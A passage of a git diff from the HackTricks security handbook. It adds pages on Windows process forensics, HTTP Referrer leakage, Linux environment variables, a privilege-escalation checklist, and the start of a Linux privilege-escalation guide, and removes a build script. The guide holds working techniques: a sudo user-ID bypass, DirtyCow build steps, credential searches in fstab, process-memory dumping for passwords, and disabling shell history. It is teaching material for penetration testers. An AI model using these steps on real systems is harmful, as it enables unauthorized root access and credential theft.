process of `svchost.exe`. If any of them is **not using the `-k` flag**, then thats very suspicious. If you find that **services.exe is not the parent**, thats also very suspicious. + +### taskhost.exe + +This process act as host for processes run from DLLs. It loads the services that are run from DLLs. +In W8 is called taskhostex.exe and in W10 taskhostw.exe. + +### explorer.exe + +This is the process responsible for the **user's desktop** and launching files via file extensions. +**Only 1** process should be spawned **per logged on user.** +This is run from **userinit.exe** which should be terminated, so **no parent** should appear for this process. + +## Catching Malicious Processes + +* Is it running from the expected path? \(No Windows binaries run from temp location\) +* Is it communicating with weird IPs? +* Check digital signatures \(Microsoft artefacts should be signed\) +* Is it spelled correctly? +* Is running under the expected SID? +* Is the parent process the expected one \(if any\)? +* Are the children processes the expecting ones? \(no cmd.exe, wscript.exe, powershell.exe..?\) + diff --git a/getting-started-in-hacking.md b/getting-started-in-hacking.md new file mode 100644 index 00000000000..946eb284b1d --- /dev/null +++ b/getting-started-in-hacking.md @@ -0,0 +1,38 @@ +# Getting Started in Hacking + +## Learning by Practice + +### [https://tryhackme.com/](https://tryhackme.com/) + +Tryhackme is a platform with virtual machines that need to be solved through walkthroughs, which is very good for beginners and normal CTFs where you self must hack into the machines. + +### [https://www.root-me.org/](https://www.root-me.org/) + +Rootme is another page for online hosted virtual machines to hack. + +### [https://www.vulnhub.com/](https://www.vulnhub.com/) + +Vulnhub has machines to download and then to hack + +### [https://www.hackthebox.eu/](https://www.hackthebox.eu/) [https://academy.hackthebox.eu/catalogue](https://academy.hackthebox.eu/catalogue) + +Hackthebox has online machines to hack, but there are very limited in the free version. + +Recently the launched their academy, but it is a bit more expensive than for example tryhackme and has less. + +### [https://hack.me/](https://hack.me/) + +This site seems to be a community platform + +### [https://www.hacker101.com/](https://www.hacker101.com/) + +free site with videos and CTFs + +### [https://crackmes.one/](https://crackmes.one/) + +This site has a lot of binaries for forensic learning. + +### [https://www.hackthissite.org/missions/basic/](https://www.hackthissite.org/missions/basic/) + +### [https://attackdefense.com/](https://attackdefense.com/) + diff --git a/hacktricks-preprocessor.py b/hacktricks-preprocessor.py deleted file mode 100644 index 14f2b91c5b7..00000000000 --- a/hacktricks-preprocessor.py +++ /dev/null @@ -1,190 +0,0 @@ -import json -import os -import sys -import re -import logging -from os import path -from urllib.request import urlopen, Request - -logger = logging.getLogger(__name__) -logger.setLevel(logging.DEBUG) -handler = logging.FileHandler(filename='hacktricks-preprocessor.log', mode='w', encoding='utf-8') -handler.setLevel(logging.DEBUG) -logger.addHandler(handler) - -handler2 = logging.FileHandler(filename='hacktricks-preprocessor-error.log', mode='w', encoding='utf-8') -handler2.setLevel(logging.ERROR) -logger.addHandler(handler2) - - -def findtitle(search, obj, key, path=()): - # logger.debug(f"Looking for {search} in {path}") - if isinstance(obj, dict) and key in obj and obj[key] == search: - return obj, path - if isinstance(obj, list): - for k, v in enumerate(obj): - item = findtitle(search, v, key, (*path, k)) - if item is not None: - return item - if isinstance(obj, dict): - for k, v in obj.items(): - item = findtitle(search, v, key, (*path, k)) - if item is not None: - return item - - -def ref(matchobj): - logger.debug(f'Ref match: {matchobj.groups(0)[0].strip()}') - href = matchobj.groups(0)[0].strip() - title = href - if href.startswith("http://") or href.startswith("https://"): - if context['config']['preprocessor']['hacktricks']['env'] == 'dev': - pass - else: - try: - raw_html = str(urlopen(Request(href, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0'})).read()) - match = re.search('(.*?)', raw_html) - title = match.group(1) if match else href - except Exception as e: - logger.debug(f'Error opening URL {href}: {e}') - pass #nDont stop on broken link - else: - try: - href = href.replace("`", "") # Prevent hrefs like: ../../generic-methodologies-and-resources/pentesting-network/`spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md` - if href.endswith("/"): - href = href+"README.md" # Fix if ref points to a folder - if "#" in href: - result = findtitle(href.split("#")[0], book, "source_path") - if result is not None: - chapter, _path = result - title = " ".join(href.split("#")[1].split("-")).title() - logger.debug(f'Ref has # using title: {title}') - else: - raise Exception(f"Chapter not found for path: {href.split('#')[0]}") - else: - result = findtitle(href, book, "source_path") - if result is not None: - chapter, _path = result - logger.debug(f'Recursive title search result: {chapter["name"]}') - title = chapter['name'] - else: - raise Exception(f"Chapter not found for path: {href}") - except Exception as e: - dir = path.dirname(current_chapter['source_path']) - rel_path = path.normpath(path.join(dir,href)) - try: - logger.debug(f'Not found chapter title from: {href} -- trying with relative path {rel_path}') - if "#" in href: - result = findtitle(path.normpath(path.join(dir,href.split('#')[0])), book, "source_path") - if result is not None: - chapter, _path = result - title = " ".join(href.split("#")[1].split("-")).title() - logger.debug(f'Ref has # using title: {title}') - else: - raise Exception(f"Chapter not found for relative path: {path.normpath(path.join(dir,href.split('#')[0]))}") - else: - result = findtitle(path.normpath(path.join(dir,href)), book, "source_path") - if result is not None: - chapter, _path = result - title = chapter["name"] - logger.debug(f'Recursive title search result: {chapter["name"]}') - else: - raise Exception(f"Chapter not found for relative path: {path.normpath(path.join(dir,href))}") - except Exception as e: - logger.debug(e) - logger.error(f'Error getting chapter title: {rel_path}') - sys.exit(1) - - - if href.endswith("/README.md"): - href = href.replace("/README.md", "/index.html") - - template = f"""{title}""" - - # translate_table = str.maketrans({"\"":"\\\"","\n":"\\n"}) - # translated_text = template.translate(translate_table) - result = template - - return result - - -def files(matchobj): - logger.debug(f'Files match: {matchobj.groups(0)[0].strip()}') - href = matchobj.groups(0)[0].strip() - title = "" - - try: - for root, dirs, files in os.walk(os.getcwd()+'/src/files'): - logger.debug(root) - logger.debug(files) - if href in files: - title = href - logger.debug(f'File search result: {os.path.join(root, href)}') - - except Exception as e: - logger.debug(e) - logger.error(f'Error searching file: {href}') - sys.exit(1) - - if title=="": - logger.error(f'Error searching file: {href}') - sys.exit(1) - - template = f"""{title}""" - - result = template - - return result - - -def add_read_time(content): - regex = r'(<\/style>\n# .*(?=\n))' - new_content = re.sub(regex, lambda x: x.group(0) + "\n\nReading time: {{ #reading_time }}", content) - return new_content - - -def iterate_chapters(sections): - if isinstance(sections, dict) and "PartTitle" in sections: # Not a chapter section - return - elif isinstance(sections, dict) and "Chapter" in sections: # Is a chapter return it and look into sub items - # logger.debug(f"Chapter {sections['Chapter']}") - yield sections['Chapter'] - yield from iterate_chapters(sections['Chapter']["sub_items"]) - elif isinstance(sections, list): # Iterate through list when in sections and in sub_items - for k, v in enumerate(sections): - yield from iterate_chapters(v) - - -if __name__ == '__main__': - global context, book, current_chapter - if len(sys.argv) > 1: # we check if we received any argument - if sys.argv[1] == "supports": - # then we are good to return an exit status code of 0, since the other argument will just be the renderer's name - sys.exit(0) - logger.debug('Started hacktricks preprocessor') - # load both the context and the book representations from stdin - context, book = json.load(sys.stdin) - - logger.debug(f"Context: {context}") - logger.debug(f"Book keys: {book.keys()}") - logger.debug(f"Book structure: {json.dumps(book, indent=2)[:500]}") - - # Handle both old (sections) and new (items) mdbook API - book_items = book.get('sections') or book.get('items', []) - - for chapter in iterate_chapters(book_items): - logger.debug(f"Chapter: {chapter['path']}") - current_chapter = chapter - # regex = r'{{[\s]*#ref[\s]*}}(?:\n)?([^\\\n]*)(?:\n)?{{[\s]*#endref[\s]*}}' - regex = r'{{[\s]*#ref[\s]*}}(?:\n)?([^\\\n#]*(?:#(.*))?)(?:\n)?{{[\s]*#endref[\s]*}}' - new_content = re.sub(regex, ref, chapter['content']) - regex = r'{{[\s]*#file[\s]*}}(?:\n)?([^\\\n]*)(?:\n)?{{[\s]*#endfile[\s]*}}' - new_content = re.sub(regex, files, new_content) - new_content = add_read_time(new_content) - chapter['content'] = new_content - - content = json.dumps(book) - logger.debug(content) - - - print(content) \ No newline at end of file diff --git a/interesting-http.md b/interesting-http.md new file mode 100644 index 00000000000..fd058e89c0a --- /dev/null +++ b/interesting-http.md @@ -0,0 +1,38 @@ +# Interesting HTTP + +## Referrer headers and policy + +Referrer is the header used by browsers to indicate which was the previous page visited. + +### Sensitive information leaked + +If at some point inside a web page any sensitive information is located on a GET request parameters, if the page contains links to external sources or an attacker is able to make/suggest \(social engineering\) the user visit a URL controlled by the attacker. It could be able to exfiltrate the sensitive information inside the latest GET request. + +### Mitigation + +You can make the browser follow a **Referrer-policy** that could **avoid** the sensitive information to be sent to other web applications: + +```text +Referrer-Policy: no-referrer +Referrer-Policy: no-referrer-when-downgrade +Referrer-Policy: origin +Referrer-Policy: origin-when-cross-origin +Referrer-Policy: same-origin +Referrer-Policy: strict-origin +Referrer-Policy: strict-origin-when-cross-origin +Referrer-Policy: unsafe-url +``` + +### Counter-Mitigation + +You can override this rule using an HTML meta tag \(the attacker needs to exploit and HTML injection\): + +```markup + + +``` + +### Defense + +Never put any sensitive data inside GET parameters or paths in the URL. + diff --git a/linux-unix/linux-environment-variables.md b/linux-unix/linux-environment-variables.md new file mode 100644 index 00000000000..c054e2d5abd --- /dev/null +++ b/linux-unix/linux-environment-variables.md @@ -0,0 +1,142 @@ +# Linux Environment Variables + +## Global variables + +The **global variables** will be **inherited** by **child processes**. + +You can create a Global variable for your current session doing: + +```bash +export MYGLOBAL="hello world" +echo $MYGLOBAL #Prints: hello world +``` + +This variable will be accessible by your current sessions and its child processes. + +You can **remove** a variable doing: + +```bash +unset MYGLOBAL +``` + +## Local variables + +The **local variables** can only be **accessed** by the **current shell/script**. + +```bash +LOCAL="my local" +echo $LOCAL +unset LOCAL +``` + +## List current variables + +```bash +set +env +printenv +cat /proc/$$/environ +cat /proc/`python -c "import os; print(os.getppid())"`/environ +``` + +## Persistent Environment variables + +#### **Files that affect behavior of every user:** + +* _**/etc/bash.bashrc**_ ****: This file is read whenever an interactive shell is started \(normal terminal\) and all the commands specified in here are executed. +* _**/etc/profile and /etc/profile.d/\***_**:** This file is read every time a user logs in. Thus all the commands executed in here will execute only once at the time of user logging in. + * **Example:** + + `/etc/profile.d/somescript.sh` + + ```bash + #!/bin/bash + TEST=$(cat /var/somefile) + export $TEST + ``` + +#### **Files that affect behavior for only a specific user:** + +* _**~/.bashrc**_ **:** This file behaves the same way _/etc/bash.bashrc_ file works but it is executed only for a specific user. If you want to create an environment for yourself go ahead and modify or create this file in your home directory. +* _**~/.profile, ~/.bash\_profile, ~/.bash\_login**_**:** These files are same as _/etc/profile_. The difference comes in the way it is executed. This file is executed only when a user in whose home directory this file exists, logs in. + +**Extracted from:** [**here**](https://codeburst.io/linux-environment-variables-53cea0245dc9) **and** [**here**](https://www.gnu.org/software/bash/manual/html_node/Bash-Startup-Files.html)\*\*\*\* + +## Common variables + +From: [https://geek-university.com/linux/common-environment-variables/](https://geek-university.com/linux/common-environment-variables/) + +* **DISPLAY** – the display used by **X**. This variable is usually set to **:0.0**, which means the first display on the current computer. +* **EDITOR** – the user’s preferred text editor. +* **HISTFILESIZE** – the maximum number of lines contained in the history file. +* **HISTSIZE -** Number of lines added to the history file when the user finish his session +* **HOME** – your home directory. +* **HOSTNAME** – the hostname of the computer. +* **LANG** – your current language. +* **MAIL** – the location of the user’s mail spool. Usually **/var/spool/mail/USER**. +* **MANPATH** – the list of directories to search for manual pages. +* **OSTYPE** – the type of operating system. +* **PS1** – the default prompt in bash. +* **PATH -** stores the path of all the directories which holds binary files you want to execute just by specifying the name of the file and not by relative or absolute path. +* **PWD** – the current working directory. +* **SHELL** – the path to the current command shell \(for example, **/bin/bash**\). +* **TERM** – the current terminal type \(for example, **xterm**\). +* **TZ** – your time zone. +* **USER** – your current username. + +## Interesting variables for hacking + +### **HISTFILESIZE** + +Change the **value of this variable to 0**, so when you **end your session** the **history file** \(~/.bash\_history\) **will be deleted**. + +```bash +export HISTFILESIZE=0 +``` + +### **HISTSIZE** + +Change the **value of this variable to 0**, so when you **end your session** any command will be added to the **history file** \(~/.bash\_history\). + +```bash +export HISTSIZE=0 +``` + +### http\_proxy + +The processes will use the **proxy** declared here to connect to internet through **http**. + +```bash +export http_proxy="http://10.10.10.10:8080" +``` + +### https\_proxy + +The processes will use the **proxy** declared here to connect to internet through **https**. + +```bash +export https_proxy="http://10.10.10.10:8080" +``` + +### PS1 + +Change how your prompt looks. + +**I have created** [**this one**](https://gist.github.com/carlospolop/43f7cd50f3deea972439af3222b68808) \(based on another, read the code\). + +Root: + +![](../.gitbook/assets/image%20%28177%29.png) + +Regular user: + +![](../.gitbook/assets/image%20%28239%29.png) + +One, two and three backgrounded jobs: + +![](../.gitbook/assets/image%20%28276%29.png) + +One background job, one stopped and last command dind't finish correctly: + +![](../.gitbook/assets/image%20%2874%29.png) + diff --git a/linux-unix/linux-privilege-escalation-checklist.md b/linux-unix/linux-privilege-escalation-checklist.md new file mode 100644 index 00000000000..f8ba4a81fd4 --- /dev/null +++ b/linux-unix/linux-privilege-escalation-checklist.md @@ -0,0 +1,160 @@ +--- +description: Checklist for privilege escalation in Linux +--- + +# Checklist - Linux Privilege Escalation + +{% hint style="danger" %} +Do you use **Hacktricks every day**? Did you find the book **very** **useful**? Would you like to **receive extra help** with cybersecurity questions? Would you like to **find more and higher quality content on Hacktricks**? +[**Support Hacktricks through github sponsors**](https://github.com/sponsors/carlospolop) **so we can dedicate more time to it and also get access to the Hacktricks private group where you will get the help you need and much more!** +{% endhint %} + +If you want to know about my **latest modifications**/**additions** or you have **any suggestion for HackTricks** or **PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/)[**telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to **give ⭐** on **github** to **motivate** **me** to continue developing this book. + +### **Best tool to look for Linux local privilege escalation vectors:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)\*\*\*\* + +### [System Information](privilege-escalation/#system-information) + +* [ ] Get **OS information** +* [ ] Check the [**PATH**](privilege-escalation/#path), any **writable folder**? +* [ ] Check [**env variables**](privilege-escalation/#env-info), any sensitive detail? +* [ ] Search for [**kernel exploits**](privilege-escalation/#kernel-exploits) **using scripts** \(DirtyCow?\) +* [ ] **Check** if the [**sudo version** is vulnerable](privilege-escalation/#sudo-version) +* [ ] \*\*\*\*[**Dmesg** signature verification failed](privilege-escalation/#dmesg-signature-verification-failed) error? +* [ ] More system enum \([date, system stats, cpu info, printers](privilege-escalation/#more-system-enumeration)\) +* [ ] [Enumerate more defenses](privilege-escalation/#enumerate-possible-defenses) + +### [Drives](privilege-escalation/#drives) + +* [ ] **List mounted** drives +* [ ] **Any unmounted drive?** +* [ ] **Any creds in fstab?** + +### \*\*\*\*[**Installed Software**](privilege-escalation/#installed-software)\*\*\*\* + +1. [ ] **Check for**[ **useful software**](privilege-escalation/#useful-software) **installed** +2. [ ] **Check for** [**vulnerable software**](privilege-escalation/#vulnerable-software-installed) **installed** + +### \*\*\*\*[Processes](privilege-escalation/#processes) + +* [ ] Is any **unknown software running**? +* [ ] Is any software with **more privileges that it should have running**? +* [ ] Search for **exploits for running processes** \(specially if running of versions\) +* [ ] Can you **modify the binary** of any running process? +* [ ] **Monitor processes** and check if any interesting process is running frequently +* [ ] Can you **read** some interesting **process memory** \(where passwords could be saved\)? + +### [Scheduled/Cron jobs?](privilege-escalation/#scheduled-jobs) + +* [ ] Is the [**PATH** ](privilege-escalation/#cron-path)being modified by some cron and you can **write** in it? +* [ ] Any [**wildcard** ](privilege-escalation/#cron-using-a-script-with-a-wildcard-wildcard-injection)in a cron job? +* [ ] Some [**modifiable script** ](privilege-escalation/#cron-script-overwriting-and-symlink)is being **executed** or is inside **modifiable folder**? +* [ ] Have you detected that some **script** could be being [**executed** very **frequently**](privilege-escalation/#frequent-cron-jobs)? \(every 1, 2 or 5 minutes\) + +### [Services](privilege-escalation/#services) + +* [ ] Any **writable .service** file? +* [ ] Any **writable binary** executed by a **service**? +* [ ] Any **writable folder in systemd PATH**? + +### [Timers](privilege-escalation/#timers) + +* [ ] Any **writable timer**? + +### [Sockets](privilege-escalation/#sockets) + +* [ ] Any **writable .socket** file? +* [ ] Can you **communicate with any socket**? +* [ ] **HTTP sockets** with interesting info? + +### [D-Bus](privilege-escalation/#d-bus) + +* [ ] Can you **communicate with any D-Bus**? + +### [Network](privilege-escalation/#network) + +* [ ] Enumerate the network to know where you are +* [ ] **Open ports you couldn't access before** getting a shell inside the machine? +* [ ] Can you **sniff traffic** using `tcpdump`? + +### [Users](privilege-escalation/#users) + +* [ ] Generic users/groups **enumeration** +* [ ] Do you have a **very big UID**? Is the **machine** **vulnerable**? +* [ ] Can you [**escalate privileges thanks to a group**](privilege-escalation/interesting-groups-linux-pe/) you belong to? +* [ ] **Clipboard** data? +* [ ] Password Policy? +* [ ] Try to **use** every **known password** that you have discovered previously to login **with each** possible **user**. Try to login also without password. + +### [Writable PATH](privilege-escalation/#writable-path-abuses) + +* [ ] If you have **write privileges over some folder in PATH** you may be able to escalate privileges + +### [SUDO and SUID commands](privilege-escalation/#sudo-and-suid) + +* [ ] Can you execute **any comand with sudo**? Can you use it to READ, WRITE or EXECUTE anything as root? \([**GTFOBins**](https://gtfobins.github.io/)\) +* [ ] Is any **exploitable suid binary**? \([**GTFOBins**](https://gtfobins.github.io/)\) +* [ ] Are [**sudo** commands **limited** by **path**? can you **bypass** the restrictions](privilege-escalation/#sudo-execution-bypassing-paths)? +* [ ] \*\*\*\*[**Sudo/SUID binary without path indicated**](privilege-escalation/#sudo-command-suid-binary-without-command-path)? +* [ ] \*\*\*\*[**SUID binary specifying path**](privilege-escalation/#suid-binary-with-command-path)? Bypass +* [ ] \*\*\*\*[**LD\_PRELOAD vuln**](privilege-escalation/#ld_preload)\*\*\*\* +* [ ] \*\*\*\*[**Lack of .so library in SUID binary**](privilege-escalation/#suid-binary-so-injection) ****from a writable folder? +* [ ] \*\*\*\*[**SUDO tokens available**](privilege-escalation/#reusing-sudo-tokens)? [**Can you create a SUDO token**](privilege-escalation/#var-run-sudo-ts-less-than-username-greater-than)? +* [ ] Can you [**read or modify sudoers files**](privilege-escalation/#etc-sudoers-etc-sudoers-d)? +* [ ] Can you [**modify /etc/ld.so.conf.d/**](privilege-escalation/#etc-ld-so-conf-d)? +* [ ] [**OpenBSD DOAS**](privilege-escalation/#doas) ****command + +### [Capabilities](privilege-escalation/#capabilities) + +* [ ] Has any binary any **unexpected capability**? + +### [ACLs](privilege-escalation/#acls) + +* [ ] Has any file any **unexpected ACL**? + +### [Open Shell sessions](privilege-escalation/#open-shell-sessions) + +* [ ] **screen**? +* [ ] **tmux**? + +### [SSH](privilege-escalation/#ssh) + +* [ ] **Debian** [**OpenSSL Predictable PRNG - CVE-2008-0166**](privilege-escalation/#debian-openssl-predictable-prng-cve-2008-0166)\*\*\*\* +* [ ] \*\*\*\*[**SSH Interesting configuration values**](privilege-escalation/#ssh-interesting-configuration-values)\*\*\*\* + +### [Interesting Files](privilege-escalation/#interesting-files) + +* [ ] **Profile files** - Read sensitive data? Write to privesc? +* [ ] **passwd/shadow files** - Read sensitive data? Write to privesc? +* [ ] **Check commonly interesting folders** for sensitive data +* [ ] **Weird Localtion/Owned files,** you may have access or alter executable files +* [ ] **Modified** in last mins +* [ ] **Sqlite DB files** +* [ ] **Hidden files** +* [ ] **Script/Binaries in PATH** +* [ ] **Web files** \(passwords?\) +* [ ] **Backups**? +* [ ] **Known files that contains passwords**: Use **Linpeas** and **LaZagne** +* [ ] **Generic search** + +### \*\*\*\*[**Writable Files**](privilege-escalation/#writable-files)\*\*\*\* + +* [ ] **Modify python library** to execute arbitrary commands? +* [ ] Can you **modify log files**? **Logtotten** exploit +* [ ] Can you **modify /etc/sysconfig/network-scripts/**? Centos/Redhat exploit +* [ ] Can you [**write in ini, int.d, systemd or rc.d files**](privilege-escalation/#init-init-d-systemd-and-rc-d)? + +### \*\*\*\*[**Other tricks**](privilege-escalation/#other-tricks)\*\*\*\* + +* [ ] Can you [**abuse NFS to escalate privileges**](privilege-escalation/#nfs-privilege-escalation)? +* [ ] Do you need to [**escape from a restrictive shell**](privilege-escalation/#escaping-from-restricted-shells)? + +If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, ****join the [💬](https://emojipedia.org/speech-balloon/) ****[**PEASS & HackTricks telegram group here**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +If you want to **share some tricks with the community** you can also submit **pull requests** to ****[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) ****that will be reflected in this book. +Don't forget to **give ⭐ on the github** to motivate me to continue developing this book. + +![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%285%29.png) + +​[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\* + diff --git a/linux-unix/privilege-escalation/README.md b/linux-unix/privilege-escalation/README.md new file mode 100644 index 00000000000..22aafabeb0a --- /dev/null +++ b/linux-unix/privilege-escalation/README.md @@ -0,0 +1,1477 @@ +# Linux Privilege Escalation + +{% hint style="danger" %} +Do you use **Hacktricks every day**? Did you find the book **very** **useful**? Would you like to **receive extra help** with cybersecurity questions? Would you like to **find more and higher quality content on Hacktricks**? +[**Support Hacktricks through github sponsors**](https://github.com/sponsors/carlospolop) **so we can dedicate more time to it and also get access to the Hacktricks private group where you will get the help you need and much more!** +{% endhint %} + +If you want to know about my **latest modifications**/**additions** or you have **any suggestion for HackTricks** or **PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/)[**telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to **give ⭐** on **github** to **motivate** **me** to continue developing this book. + +## System Information + +### OS info + +Let's starting gaining some knowledge of the OS running + +```bash +(cat /proc/version || uname -a ) 2>/dev/null +lsb_release -a 2>/dev/null +``` + +### Path + +If you **have write permissions on any folder inside the `PATH`** variable you may be able to hijacking some libraries or binaries: + +```bash +echo $PATH +``` + +### Env info + +Interesting information, passwords or API keys in the environment variables? + +```bash +(env || set) 2>/dev/null +``` + +### Kernel exploits + +Check the kernel version and if there is some exploit that can be used to escalate privileges + +```bash +cat /proc/version +uname -a +searchsploit "Linux Kernel" +``` + +You can find a good vulnerable kernel list and some already **compiled exploits** here: [https://github.com/lucyoa/kernel-exploits](https://github.com/lucyoa/kernel-exploits) and [exploitdb sploits](https://github.com/offensive-security/exploitdb-bin-sploits/tree/master/bin-sploits). +Other sites where you can find some **compiled exploits**: [https://github.com/bwbwbwbw/linux-exploit-binaries](https://github.com/bwbwbwbw/linux-exploit-binaries), [https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack](https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack) + +To extract all the vulnerable kernel versions from that web you can do: + +```bash +curl https://raw.githubusercontent.com/lucyoa/kernel-exploits/master/README.md 2>/dev/null | grep "Kernels: " | cut -d ":" -f 2 | cut -d "<" -f 1 | tr -d "," | tr ' ' '\n' | grep -v "^\d\.\d$" | sort -u -r | tr '\n' ' ' +``` + +Tools that could help searching for kernel exploits are: + +[linux-exploit-suggester.sh](https://github.com/mzet-/linux-exploit-suggester) +[linux-exploit-suggester2.pl](https://github.com/jondonas/linux-exploit-suggester-2) +[linuxprivchecker.py](http://www.securitysift.com/download/linuxprivchecker.py) \(execute IN victim,only checks exploits for kernel 2.x\) + +Always **search the kernel version in Google**, maybe your kernel version is wrote in some kernel exploit and then you will be sure that this exploit is valid. + +### CVE-2016-5195 \(DirtyCow\) + +Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8 + +```bash +# make dirtycow stable +echo 0 > /proc/sys/vm/dirty_writeback_centisecs +g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil +https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs +https://github.com/evait-security/ClickNRoot/blob/master/1/exploit.c +``` + +### Sudo version + +Based on the vulnerable sudo versions that appear in: + +```bash +searchsploit sudo +``` + +You can check if the sudo version is vulnerable using this grep. + +```bash +sudo -V | grep "Sudo ver" | grep "1\.[01234567]\.[0-9]\+\|1\.8\.1[0-9]\*\|1\.8\.2[01234567]" +``` + +### sudo <= v1.28 + +From @sickrov + +```text +sudo -u#-1 /bin/bash +``` + +### Dmesg signature verification failed + +Check **smasher2 box of HTB** for an **example** of how this vuln could be exploited + +```bash +dmesg 2>/dev/null | grep "signature" +``` + +### More system enumeration + +```bash +date 2>/dev/null #Date +(df -h || lsblk) #System stats +lscpu #CPU info +lpstat -a 2>/dev/null #Printers info +``` + +### Enumerate possible defenses + +#### AppArmor + +```bash +if [ `which aa-status 2>/dev/null` ]; then + aa-status + elif [ `which apparmor_status 2>/dev/null` ]; then + apparmor_status + elif [ `ls -d /etc/apparmor* 2>/dev/null` ]; then + ls -d /etc/apparmor* + else + echo "Not found AppArmor" +fi +``` + +#### Grsecurity + +```bash +((uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo "Not found grsecurity") +``` + +#### PaX + +```bash +(which paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo "Not found PaX") +``` + +#### Execshield + +```bash +(grep "exec-shield" /etc/sysctl.conf || echo "Not found Execshield") +``` + +#### SElinux + +```bash + (sestatus 2>/dev/null || echo "Not found sestatus") +``` + +#### ASLR + +```bash +cat /proc/sys/kernel/randomize_va_space 2>/dev/null +#If 0, not enabled +``` + +### Docker Breakout + +If you are inside a docker container you can try to escape from it: + +{% page-ref page="docker-breakout.md" %} + +## Drives + +Check **what is mounted and unmounted**, where and why. If anything is unmounted you could try to mount it and check for private info + +```bash +ls /dev 2>/dev/null | grep -i "sd" +cat /etc/fstab 2>/dev/null | grep -v "^#" | grep -Pv "\W*\#" 2>/dev/null +#Check if credentials in fstab +grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null +``` + +## Installed Software + +### Useful software + +Enumerate useful binaries + +```bash +which nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch docker lxc ctr runc rkt kubectl 2>/dev/null +``` + +Also, check if **any compiler is installed**. This is useful if you need to use some kernel exploit as it's recommended to compile it in the machine where you are going to use it \(or in one similar\) + +```bash +(dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; which gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/") +``` + +### Vulnerable Software Installed + +Check for the **version of the installed packages and services**. Maybe there is some old Nagios version \(for example\) that could be exploited for escalating privileges… +It is recommended to check manually the version of the more suspicious installed software. + +```bash +dpkg -l #Debian +rpm -qa #Centos +``` + +If you have SSH access to the machine you could also use **openVAS** to check for outdated and vulnerable software installed inside the machine. + +{% hint style="info" %} +_Note that these commands will show a lot of information that will mostly be useless, therefore it's recommended some application like OpenVAS or similar that will check if any installed software version is vulnerable to known exploits_ +{% endhint %} + +## Processes + +Take a look to **what processes** are being executed and check if any process has **more privileges than it should** \(maybe a tomcat being executed by root?\) + +```bash +ps aux +ps -ef +top -n 1 +``` + +Always check for possible [**electron/cef/chromium debuggers** running, you could abuse it to escalate privileges](electron-cef-chromium-debugger-abuse.md). **Linpeas** detect those by checking the `--inspect` parameter inside the command line of the process. +Also **check your privileges over the processes binaries**, maybe you can overwrite someone. + +### Process monitoring + +You can use tools like [**pspy**](https://github.com/DominicBreuker/pspy) to monitor processes. This can be very useful to identify vulnerable processes being executed frequently or when a set of requirements are met. + +### Process memory + +Some services of a server save **credentials in clear text inside the memory**. +Normally you will need **root privileges** to read the memory of processes that belong to other users, therefore this is usually more useful when you are already root and want to discover more credentials. +However, remember that **as a regular user you can read the memory of the processes you own**. + +#### GDB + +If you have access to the memory of a FTP service \(for example\) you could get the Heap and search inside of it the credentials. + +```bash +gdb -p +(gdb) info proc mappings +(gdb) q +(gdb) dump memory /tmp/mem_ftp +(gdb) q +strings /tmp/mem_ftp #User and password +``` + +#### GDB Script + +{% code title="dump-memory.sh" %} +```bash +#!/bin/bash +#./dump-memory.sh +grep rw-p /proc/$1/maps \ + | sed -n 's/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p' \ + | while read start stop; do \ + gdb --batch --pid $1 -ex \ + "dump memory $1-$start-$stop.dump 0x$start 0x$stop"; \ +done +``` +{% endcode %} + +#### /proc/$pid/maps & /proc/$pid/mem + +For a given process ID, **maps shows how memory is mapped within that processes'** virtual address space; it also shows the **permissions of each mapped region**. The **mem** pseudo file **exposes the processes memory itself**. From the **maps** file we know which **memory regions are readable** and their offsets. We use this information to **seek into the mem file and dump all readable regions** to a file. + +```bash +procdump() +( + cat /proc/$1/maps | grep -Fv ".so" | grep " 0 " | awk '{print $1}' | ( IFS="-" + while read a b; do + dd if=/proc/$1/mem bs=$( getconf PAGESIZE ) iflag=skip_bytes,count_bytes \ + 